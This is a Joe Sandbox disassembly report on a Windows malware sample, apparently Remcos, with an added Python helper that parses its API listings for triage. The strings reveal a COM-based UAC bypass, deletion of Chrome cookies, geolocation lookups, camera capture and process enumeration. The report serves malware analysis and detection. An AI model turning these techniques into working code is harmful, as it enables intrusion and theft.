                              • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                              • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                              • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                              • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                              • int.LIBCPMT ref: 0040FC0F
                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                              • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                              • String ID: P[G
                              • API String ID: 2536120697-571123470
                              • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                              • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                              • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                              • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                              APIs
                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                              • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                              Strings
                              • http://geoplugin.net/json.gp, xrefs: 0041A54E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleOpen$FileRead
                              • String ID: http://geoplugin.net/json.gp
                              • API String ID: 3121278467-91888290
                              • Opcode ID: c5dbe650c2b1e746fdbc2daec530ac84cdca8e5a9277d0c229b6a7b2c13287e2
                              • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                              • Opcode Fuzzy Hash: c5dbe650c2b1e746fdbc2daec530ac84cdca8e5a9277d0c229b6a7b2c13287e2
                              • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
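Two of the entries above carry the most useful triage signal on this page: the Toolhelp32 walk that calls OpenProcess and IsWow64Process on every process it finds, and the WinINet fetch of http://geoplugin.net/json.gp. The hex arguments the IDA plugin recovered are meaningful once decoded against the SDK constants (0x400 is PROCESS_QUERY_INFORMATION, 0x1000 is PROCESS_QUERY_LIMITED_INFORMATION, 0x80000000 on InternetOpenUrlW is INTERNET_FLAG_RELOAD, access type 1 on InternetOpenW is INTERNET_OPEN_TYPE_DIRECT). The following Python is an added example, not part of the Joe Sandbox report and not Remcos code: it parses the "APIs" bullet lines of an entry, decodes those arguments, and applies a few capability rules of its own. The sample entries are copied from the two functions above; the rule names and the choice of decoded arguments are this example's assumptions.

```python
"""Triage helper for the 'APIs' bullet lines of a Joe Sandbox function entry
('Name.MODULE(args), ref: ADDR', optionally prefixed by 'Part of subcall
function ADDR:').  The sample entries are copied from the report above; the
flag tables come from the Windows SDK headers and the capability rules are
this example's own, not Joe Sandbox output."""
from __future__ import annotations
import re
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

@dataclass
class Call:
    name: str
    module: str
    args: list[str]             # raw tokens; '?' where IDA could not recover the value
    ref: str                    # address of the call site
    subcall_of: Optional[str]   # callee address when the call sits inside a subroutine

def parse_calls(text: str) -> list[Call]:
    """Return the calls of one entry in listing order, skipping non-API lines."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(Call(m["name"], m["mod"], args, m["ref"], m["sub"]))
    return calls

# SDK constants for the arguments worth reading during triage.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
INTERNET_FLAGS = {0x00800000: "INTERNET_FLAG_SECURE", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                  0x80000000: "INTERNET_FLAG_RELOAD"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}

def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    """Split a bit mask into SDK names; unknown bits are kept as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)      # keys are distinct bits, so sum == OR
    return names + ([f"0x{leftover:X}"] if leftover else [])

# (API, argument index) -> decoder.  Only recoverable hex literals are decoded.
DECODERS = {
    ("OpenProcess", 0): lambda v: decode_flags(v, PROCESS_ACCESS),
    ("InternetOpenW", 1): lambda v: [INTERNET_OPEN_TYPE.get(v, f"0x{v:X}")],
    ("InternetOpenUrlW", 4): lambda v: decode_flags(v, INTERNET_FLAGS),
    ("CoInitializeEx", 1): lambda v: ["COINIT_APARTMENTTHREADED" if v & 0x2 else "COINIT_MULTITHREADED"],
    ("Sleep", 0): lambda v: [f"{v} ms"],
}

def decode_call(call: Call) -> dict[int, list[str]]:
    out = {}
    for (api, idx), fn in DECODERS.items():
        if call.name == api and idx < len(call.args) and re.fullmatch(r"[0-9A-Fa-f]{1,8}", call.args[idx]):
            out[idx] = fn(int(call.args[idx], 16))
    return out

def assess(calls: list[Call]) -> list[str]:
    """Capability rules over one entry, subcalls included (rule names are this example's own)."""
    names = {c.name for c in calls}
    findings = []
    if {"Process32NextW", "OpenProcess"} <= names:
        findings.append("Toolhelp32 process walk that opens each process")
    if {"IsWow64Process", "OpenProcess"} <= names:
        findings.append("bitness check on foreign processes (IsWow64Process)")
    for c in calls:
        if c.name == "InternetOpenUrlW" and any("geoplugin.net" in a for a in c.args):
            findings.append("external geolocation lookup over WinINet: "
                            + next(a for a in c.args if "geoplugin.net" in a))
    return findings

# Constructed input: the two entries above, copied verbatim.
PROCESS_ENUM_ENTRY = """\
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
• CloseHandle.KERNEL32(00000000), ref: 0040E8AB
  • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
  • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
"""
GEOLOCATION_ENTRY = """\
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
• InternetCloseHandle.WININET(00000000), ref: 0041A5B3
"""

if __name__ == "__main__":
    for entry in (PROCESS_ENUM_ENTRY, GEOLOCATION_ENTRY):
        print(assess(parse_calls(entry)))
```

The parser keeps the "Part of subcall function" address so a reviewer can tell which helper actually issues OpenProcess; the first helper asks for PROCESS_QUERY_INFORMATION (enough for IsWow64Process), the second only for PROCESS_QUERY_LIMITED_INFORMATION, which also succeeds against protected processes. The geolocation lookup carries INTERNET_FLAG_RELOAD, so the request always leaves the host rather than being served from the WinINet cache, which is why it is a reliable network indicator for this family.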
                              APIs
                                • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                              • _free.LIBCMT ref: 0044FD29
                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                              • _free.LIBCMT ref: 0044FD34
                              • _free.LIBCMT ref: 0044FD3F
                              • _free.LIBCMT ref: 0044FD93
                              • _free.LIBCMT ref: 0044FD9E
                              • _free.LIBCMT ref: 0044FDA9
                              • _free.LIBCMT ref: 0044FDB4
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                              • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                              • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                              • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                              APIs
                              • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe), ref: 00406835
                                • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                              • CoUninitialize.OLE32 ref: 0040688E
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 00406815, 00406818, 0040686A
                              • [+] ucmCMLuaUtilShellExecMethod, xrefs: 0040681A
                              • [+] before ShellExec, xrefs: 00406856
                              • [+] ShellExec success, xrefs: 00406873
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitializeObjectUninitialize_wcslen
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                              • API String ID: 3851391207-3531247953
                              • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                              • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                              • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                              • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                              • int.LIBCPMT ref: 0040FEF2
                                • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                              • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                              • String ID: H]G
                              • API String ID: 2536120697-1717957184
                              • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                              • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                              • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                              • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                              • GetLastError.KERNEL32 ref: 0040B2EE
                              Strings
                              • [Chrome Cookies not found], xrefs: 0040B308
                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                              • UserProfile, xrefs: 0040B2B4
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                              • Opcode Fuzzy Hash: affce56bb21929d7383bdb2dccb574c79b51b4180e8c74c87d019dc2b0b7a2d9
                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                              Strings
                              • C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, xrefs: 00406927
                              • Rmc-4NJUM7, xrefs: 0040693F
                              • BG, xrefs: 00406909
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe$Rmc-4NJUM7$BG
                              • API String ID: 0-355280248
                              • Opcode ID: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                              • Opcode Fuzzy Hash: 51f1828bc25dd4c0d61216237760cedcfa3e45f86a5da5526d20c461b23c031b
                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                              APIs
                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                              • Sleep.KERNEL32(00002710), ref: 00419F79
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm triggered$`#v
                              • API String ID: 614609389-3049340936
                              • Opcode ID: b235acc6dc62185f624d205ca418591b0f75406fe2ec0c8e15ad043012baae45
                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                              • Opcode Fuzzy Hash: b235acc6dc62185f624d205ca418591b0f75406fe2ec0c8e15ad043012baae45
                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                              APIs
                              • __allrem.LIBCMT ref: 00439789
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                              • __allrem.LIBCMT ref: 004397BC
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                              • __allrem.LIBCMT ref: 004397F1
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                              • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe
                              • String ID:
                              • API String ID: 4189289331-0
                              • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                              • Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: __freea$__alloca_probe_16
                              • String ID: a/p$am/pm
                              • API String ID: 3509577899-3206640213
                              • Opcode ID: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                              • Opcode Fuzzy Hash: d668ed5ce2b854fb72e884dc7fab13e06c8dfc9310cdef7ee07e25d8e59df702
                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prologSleep
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                              • API String ID: 3469354165-462540288
                              • Opcode ID: c06602ad5b80aab45bf926ea6107a81c7929f47509625bccb2b61e836fe0621c
                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                              • Opcode Fuzzy Hash: c06602ad5b80aab45bf926ea6107a81c7929f47509625bccb2b61e836fe0621c
                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                              APIs
